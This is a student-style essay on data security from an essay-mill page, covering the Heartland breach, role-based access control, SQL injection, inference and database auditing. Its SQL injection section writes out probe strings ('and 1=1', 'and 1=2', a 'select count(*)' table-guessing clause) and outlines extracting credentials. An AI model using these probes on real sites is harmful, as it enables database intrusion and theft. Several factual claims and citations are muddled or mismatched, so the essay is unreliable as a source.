Data Security | EssayIvy.com

Running head: DATA SECURITY 1

Data Security

Name

Institution

DATA SECURITY 2

Abstract

The data breach by Albert Gonzalez in 2008 that compromised over 130 million credit card users

of the Heartland Payment Systems went down as the largest cybercrime in history and a turning

point in Data security. Data security is a primary concern for most online users as both

intelligence and cyber criminals participate actively in cybercrime. Data is the most valuable asset

in the current digital era, and many cyber criminals exploit the vulnerabilities of data websites to

gain access to such information for personal gain. Most organizations rely on websites for the

safekeeping of sensitive data, but cyber criminals exploit loopholes such as SQL inject bugs and

unauthorized access to gain access to their servers, steal data and later use it to commit fraud. In

response, software engineers have come up with applications and database auditing to curb

cybercrime. While applications are effective, database auditing does not allow for real-time

response to potential cyber-attacks. Additionally, merging data access systems and privacy issues

remains a major obstacle for software engineers. Most people use mobile devices to conduct both

their personal lives and professional lives through social media networks and applications which

leave them vulnerable to cyber-attacks. Therefore, there is the need for increased awareness

towards data security threats and more stringent measures to safeguard the security of online

users.

Key words: SQL inject bugs, data auditing, access control, role authorization, data

inference.

DATA SECURITY 3

Introduction

In late 2008, the 28-year old Albert Gonzalez led a team of identity thieves and stole an

approximate 130 million credit card numbers from Heartland Payment Systems which is the sixth

largest credit card processor in the United States. Gonzalez, a former secret service informant in

computer crime, combined efforts with his friends to identify and exploit weaknesses at the

Heartland Payment Systems and later to steal from millions of unsuspecting Americans.

Heartland Securities discovered the illegal activity in 2009 and also admitted that they were

unaware of how long the malware had remained in their system. On August 2009, Gonzalez

pleaded guilty to the charge and 19 other charges, and in July 2010 the Senate proposed the Data

Security Act of 2010 which would hold organizations responsible for sensitive data. A recent

report by WikiLeaks indicates that both organizations and cyber criminals are responsible for the

increased levels of cyber security.

In the current digital era, data has become one of the most valuable resources to

humankind. With the ever increasing challenges and threats of maintaining and protecting data,

enterprises are faced with a tough task. According to the Data Protection Act, developers have a

responsibility to ensure the protection of personal information (Calder & Steve 2005). The

database is the most widely used platform to store data since it allows for easy access and

maintenance of data. However, the database also is also vulnerable to breaches at four main levels

which include database and system developers, employees and developers, and security officers.

A person who seeks to breach a database is an attacker, and they can take the position of an

insider, intruder or an administrator. Additionally, attacks can be either passive or active and or,

direct or indirect.

DATA SECURITY 4

The United States government is becoming increasingly concerned following the

numerous cases of databases security threats experienced worldwide. The core purpose of the

database security system is to ensure that only authenticated users gain access to the said

database. The Privacy Rights House which started tracking data security activity in 2005 reports

that over 345 million customer records have either been stolen or lost due to data security issues.

In turn, the cost of a data breach has gone as high as 202 USD for every customer record. In 2009,

the largest data breach in history was perpetrated by three hackers who used the SQL injection to

exploit a vulnerability stealing 130million debit and credit card information. Matwyshyn asserts

that 75 percent of data breaches are conducted by outsiders against a mere 20 percent from within

the organization (2009). Most cyber criminals who use unauthorized personnel to gain access to

information include government personnel, competitors and in-house personnel seeking to gain

access to trade secrets and intellectual properties among other sensitive information (Fitzpatrick

& Dilullo 307). 91 percent of data breaching is also linked to criminal groups and activities.

The current digital society exposes online users to potential cyber-attacks with both

intelligence and cyber criminals breaching data security for different reasons with the use of easy

steps such as unauthorized access and SQL inquiries, and therefore, there is need for more

stringent measures to protect individuals from potential data breach.

Hacking

Hacking by unauthorized users and malware such as the SQL injecttion are responsible

for most hacking incidences, in spite of the fact that both are preventable and common knowledge

among the software engineering community. According to Bernik, the high number of individuals

DATA SECURITY 5

using digital platforms has made it more difficult to curb digital crimes in the society. Therefore,

there is a dire need to increase awareness and emphasis on data security strategies. It is also

notable that it is not only criminals who are responsible for hacking activities. Recently, the

WikiLeaks groups released voluminous files disclosing how intelligence organizations carry out

carry hacking activities to gain access to individual personal data such as mobile phones and

personal computers ((MacAskill, Thielman, and Oltermann, 2017). CIA has further automated the

malware so as to gain direct access to such mobile devices (Heisler, 2017).

Authorized Access

The central role of a database is to ensure that only authorized users to obtain access to an

individual database at authorized times. Therefore, the database security system operated by

providing controlled and protected access to authorized users. The fundamental principle of the

database system was the authentication of users which has since proven inadequate given the

rising incidences of hacking leading to the loss of sensitive data. It is, therefore, evident that there

database security system still challenges an insurmountable degree of threats and challenges

which need to be addressed and solutions devised to address the problem (Shen, 2013). One of the

most widespread methods used to protect is limiting data access through authentication, access

control, and authorization. Such provisions often grant rights to specific objects and users. One

widely used strategy is the use of usernames and passwords.

Access Control

Access control is another method employed in database security. The access control

allows objects and users to perform various actions which might include read, edit, delete and

DATA SECURITY 6

update as well as other SQL enabled functions. Control limits refer to objects and actions limited

to specific users. Objects to database security include table, columns and SQL objects such as

stored procedures and views. Examples of data actions will include update, delete, insert and read.

For example, a student will be allowed the read-only mandate to an online class’s database.

Access control can is three dimensions which include Mandatory Access Control, Role-Based

Access Control, and Discretionary Access Control. An example of the MAC is when a faculty

member is allowed the read-only function for a particular course. The DAC, on the contrary, will

allow access to read only for access to the faculty database but only to certain courses. The most

effective access control is the Role Based Access control is the most effective database security

control which provides access to analogous functions. The system identifies various objects and

operations and proceeds to assign access to various roles. Therefore, the user receives automated

privileges depending on the roles. For example, the student receives the read only mandate while

the head of the faculty receives privileges such as updating, editing and creating content on the

database among others. The process of granting users privileges based on their roles abide by the

procedure listed below;

The access control module requires the ability to revoke and grant privileges. The

implementation of these privileges requires the correspondence with certain SQL statements. For

example, the process of creating different roles assigned to various users requires the database

administrator to create the various roles for the faculty members and assigning various privileges

DATA SECURITY 7

to each of these users. Therefore, the user is automatically granted various privileges provided

they are assigned the role of the database administrator.

Figure 1. Granting Role Authorization

Similarly, the revoking strategy eliminates various users from certain authorization roles.

This might include allowing certain user’s access to certain objects or authorization roles. Once

the roles are revoked, the members of the faculty will be denied access to certain roles.

DATA SECURITY 8

Figure 2. Revoking role authorization

However, certain data security issues still arise from this strategy. While revoking and

granting role authorization is a pretty facile, the management of these roles is the real task. The

effective functioning of the access control system calls for continuous management (Sales, 2010).

The access control modules operate under the general rule that the most restrictive set of

privileges is assigned to absolutely authorized tasks. In addition to the fact that building the

access control system is a complex task, users in an organization change their roles constantly,

therefore, calling for constant monitoring which is hefty.

SQL inquiry

Data holes is another leading source of data threats which enables attacks to launch their

attacks using applications such as SQL injection. According to the SQL inject principle, the

attacker deceives the database to execute unauthorized functions by adding extra information on

DATA SECURITY 9

the standard authorized SQL command. Such applications are executed at the end of inquiry

statements used in application programs. The SQL inject exploits the incompetency on the part of

the programmer who fails to detect such as vulnerability or complete the SQL sequence.

Therefore, the attacker submits malicious inquiries so as to deceive the server to execute certain

malicious function so as to gain the control of the entire website in the long run (Fitzpatrick &

Dilullo, 2015). The SQL thrives on the fact that when inputting information from subscribers,

limited verification is conducted which is used directly in the generation of SQL commands.

Process of SQL attack and method

The SQL attack involves a sequence of events before the user finally gains full control of

the server. The first step is a trial in which the attacker uses design inputs to inject the SQL in

application programs (Monahan, 2010). Consecutively, information is then imported from the

server to gain control of the implementation programs. This information is then used to gain

access to obtain the authority of the server’s administration, thus full control of the server.

SQL inject bugs

The discovery of an SQL inject bug is often the first step leading to further attack. The

attackers begin by identifying the aim of the database so as to establish the type of SQL inject bug

appropriate for the attack. The most commonly applied SQL inject bugs include the additional of

single quotes or characters at the end of the initial command inquiry. The database provided a

prompt message which enables the hacker to identify there is an SQL inject bug available for the

system. Another common type of bug is the Push `and 1=1` and `and 1=2 at the end of the inquiry

command. If the 1=1` stay regular and `and 1=2` go wrong, it means that there is a bug which the

DATA SECURITY 10

hacker can exploit. With the use of the discovered bug, the hacker proceeds to conduct illegal

inquiries and malicious functions after identifying the assaultable bugs. Also, attackers can

discover inject bugs by simply discerning the build in the variable of the database and its function.

After identifying the bugs, the hacker proceeds to use the bugs to cause limitless data

security breaches which includes obtaining confidential information, and taking control of both

the server and the data base. With the acquisition of the bug, the user has access to information on

the server which they can use to their advantage so as to get whatever information they want from

the site. The first step that the user takes is to speculate and obtain both the table name and the

user name. The hacker uses the command `and (select count(*) from TestDB.dbo.tablename)>0;

to speculate the table name. If the information is available on the server, the webpage goes back

as it was and therefore the hacker’s activity goes unnoticed. After obtaining the table name and

and the field name the attacker uses ASCII word-by-word to decode the field value, after which

they have access to usernames, passwords and all other information available on the database

(Spivey & Echeverria, 2015). Therefore, those who use the SQL inject bugs aim for the

authentication of the administrator which later allows them to add Trojans to the webpages,

contrary to other methods which only target the account numbers of the users on the database.

Data Inference

Another threat to data security is inference. Inference refers to the ability to derive

unknown information from known information. The leading concern is that there is no absolute

solution to this problem. Alternatives include concealing information during queries and offering

information that is not completely accurately so that they user cannot use the information to come

DATA SECURITY 11

up with the information that is not provided. In some instances, the user does not intend to derive

the individual’s data, but since the aggregate data is readily available, the user proceeds to derive

data using the provided data. The example is given that of an employee with access to the

remuneration criteria used in the organization (Lee, 2002). Based on the classification of various

job groups, the employee can successfully determine the income of their colleague. Alternatively,

if an employee is denied access to a certain application on the organization's database, they will

infer that section contains certain information with the potential to cause the organization harm.

The procedure for determining solutions to data inference is extremely complex. The

solution revolves around revoking a user’s access to various applications based on their previous

history. The leading challenge to this solution is that there is a delay between the time of query

and the implementation of the revocation (Iovan, 2016). Another challenge is coming up with an

appropriate response when such as query is detected.

Database Auditing

Data auditing and applications are some of the solutions to data security threats and

challenges. Database auditing allows for tracking of the user’s activities on the database. Among

its functions includes identifying who accessed the website, the actions performed as well as data

changed. Although the system does prevent breaches, it enables the administrator to recognize if

breaches have occurred. Categories of database auditing include monitoring database access

attempts, Data Definition Language, Data Control Language and Data Manipulation Language

(Hu, Fei, et al., 2008). For example monitoring access retains information on both successful

DATA SECURITY 12

The leading challenge to database auditing is deciding how much information should be

retained and for what duration. A basic data trail will keep track of users, changes to the database

as well as a number of sources used to gain access to the site. Additionally, it also enables the

administrator to track the user’s activities on the database. The most commonly accessed

information on the data trail include access attempts, data accessed and modifications, attempts to

make changes in violation of the database policies as well as unsuccessful attempts to access data

on the website. Another challenge to the database auditing system is that it denies the opportunity

to address the possible data breaching in a timely manner. Essentially, the database auditing

system requires the analysis of the data collected, thus leading to a time gap between the point of

security breach and time of discovery (Collins, 2014). Although solutions are being devised to

come up with real-time notifications of such violations to the administrators, it is far from reality.

Applications

On the contrary, applications are more effective in the prevention of data breach. Most

users do not access a database directly but rather with the use of an application program.

Application programs use a security matrix that allows for both input and output sources.

According to Tong, the security matrix is advantageous since they apply visuals which make it

easier to identify any data breaches to the system (2008). Changing one aspect of the security

matrix results in consecutive changes to other aspects of the application which requires

authorization to become effective.

DATA SECURITY 13

Counterargument

In spite of the numerous attempts and milestones achieved in data security, insider threat

remains a leading concern with limited solutions. The purpose of the access control mechanism is

to allow subjects access to certain objects so as to perform specific actions. The access control

decision executed by the access control system is monitors permitted access on the grounds of

time, location, access and time. Access control models restrict data access through user identity

attributes, locations, the purpose of data usage and time periods. However, these access control

models leave one issue unattended, the reconciliation of access control with privacy, and the

application of access control models in social networks and mobile devices. The access control

models require private information such as the user’s location and their user identity attributes.

According to Bertino, such information exposes the user to privacy breaches as well as

the potential spear phishing attacks because access control models rely on the cloud for data

management (2012). Therefore, maintaining data control while at the same time protecting the

privacy rights remains a leading challenge to the elimination of data security threats and

challenges. Users are particularly concerned about the safety of both their personal and contextual

information. The concerns of the public are on the rise as most people rely on both social

networks and mobile devices to run both their personal and professional life. However, unlike in

the cases of databases where there are data access control models responsible for monitoring of

data, the mobile devices are responsible for control, and it is difficult to establish whether the

mobile devices play this function effectively (Bernik, 2014).

DATA SECURITY 14

Conclusively, data security threats and challenges are on the rise with both organizations

and individuals participating actively in cybercrimes such as hacking. While organizations such as

CIA attribute their data breaching to security concerns, individuals such as Albert Gonzalez use

such skills for their personal gain. The nature of the digital technology has made it increasingly

easy for individuals to breach data security. Database which are used to store large volumes of

data have become the primary target of attackers. Attacks can be both direct and indirect with

many attackers exploiting weaknesses on data bases such as SQL inject bugs to hack into other

systems.

There are several solutions in place for data breaching some of which include application

and data auditing systems. While applications are almost effective, they fail to address the issue of

privacy in relation to data access control. The data audit system enables administrators to

recognize unauthorized activity in the system. However, the greatest shortcoming is that it does

not allow for a real-time response as the administrator relies on data analysis to recognize a data

breach. Therefore, these systems are still undergoing reviews to come up with effective systems.

Personal and contextual information of online users faces a heightened risk to data breach

which results from the increased reliance of mobile devices and social networks. Security

agencies such as the CIA also conduct data breaching in the name of security against terrorist

activities. Most mobile users rely on their personalized devices for a wide range of activities, both

personal and professional. Therefore, the lack of reliable data security controls places these users

at a great risk of cyber-attacks. It is imperative that there is a widespread awareness on the

menace that is data security and that the responsible bodies implement more stringent measures to

curb cyber-crimes.

DATA SECURITY 15

References

Bernik, I. (2014). Cybercrime: The Cost of Investments into Protection. Varstvoslovje, 16(2), 105.

Bertino, E. (2012). Data protection from insider threats. Synthesis Lectures on Data

Management, 4(4), 1-91.

Calder, A., & Watkins, S. (2005). IT governance: A manager's guide to data security and BS

7799/ISO 17799. Kogan Page Publishers.

Collins, M. (2014). Network security through data analysis: building situational awareness.

“O’Reilly Media, Inc.".

Fitzpatrick, W. M., & Dilullo, S. A. (2015, July). Cyber Espionage and the SPIES Taxonomy. In

Competition Forum (Vol. 13, No. 2, p. 307). American Society for Competitiveness.

Heisler, (2017, March). "Apple responds to CIA iPhone exploits uncovered in new WikiLeaks

data dump." BGR. N.P. Url://bgr.com/2017/03/08/cia-wikileaks-apple-iphone-hacking-

patch .Accessed on. 12 Mar. 2017.

Hu, F., Qiu, M., Li, J., Grant, T., Taylor, D., McCaleb, S., ... & Hamner, R. (2011). A review on

cloud computing: Design challenges in architecture and security. CIT. Journal of

Computing and Information Technology, 19(1), 25-55.

DATA SECURITY 16

Iovan, S., & Iovan, A. A. (2016). From Cyber Threats to Cyber-Crime. Journal of Information

Systems & Operations Management, 425.

Lee, R. B., Fiskiran, A. M., Shi, Z., & Yang, X. (2002). Refining instruction set architecture for

high-performance multimedia processing in constrained environments. In Application-

Specific Systems, Architectures and Processors, 2002. Proceedings. The IEEE

International Conference on (pp. 253-264). IEEE.

MacAskill, E., Sam., and Philip, O. (2017, March) "WikiLeaks publishes 'biggest ever leak of

secret CIA documents'" The Guardian. Guardian News and Media.

Url://www.theguardian.com/media/2017/mar/07/wikileaks-publishes-biggest-ever-leak-

of-secret-cia-documents-hacking-surveillance. Accessed on 05 Mar. 2017.

Matwyshyn, A. (Ed.). (2009). Harboring data: information security, law, and the corporation.

Stanford University Press.

Monahan, T. (2010). The future of security? Surveillance operations at homeland security fusion

centers. Social Justice, 37(2/3 (120-121), 84-98.

Sales, N. A. (2010). Mending walls: Information sharing after the USA PATRIOT Act.

Shen, Y. (Ed.). (2013). Enabling the New Era of Cloud Computing: Data Security, Transfer, and

Management: Data Security, Transfer, and Management. IGI Global.

Spivey, B., & Echeverria, J. (2015). Hadoop Security: Protecting your big data platform. "

O'Reilly Media, Inc.".

DATA SECURITY 17

Tong, C. K. (Ed.). (2008). Governance of Picture Archiving and Communications Systems: Data

Security and Quality Management of Filmless Radiology: Data Security and Quality

Management of Filmless Radiology. IGI Global.

Place new order. It's free, fast and safe

Paper type

Deadline

Page count

550 words

Total price: $ 15.00

Our customers say

Jeff Curtis

USA, Student

"I'm fully satisfied with the essay I've just received. When I read it, I felt like it was exactly what I wanted to say, but couldn’t find the necessary words. Thank you!"

Ian McGregor

UK, Student

"I don’t know what I would do without your assistance! With your help, I met my deadline just in time and the work was very professional. I will be back in several days with another assignment!"

Shannon Williams

Canada, Student

"It was the perfect experience! I enjoyed working with my writer, he delivered my work on time and followed all the guidelines about the referencing and contents."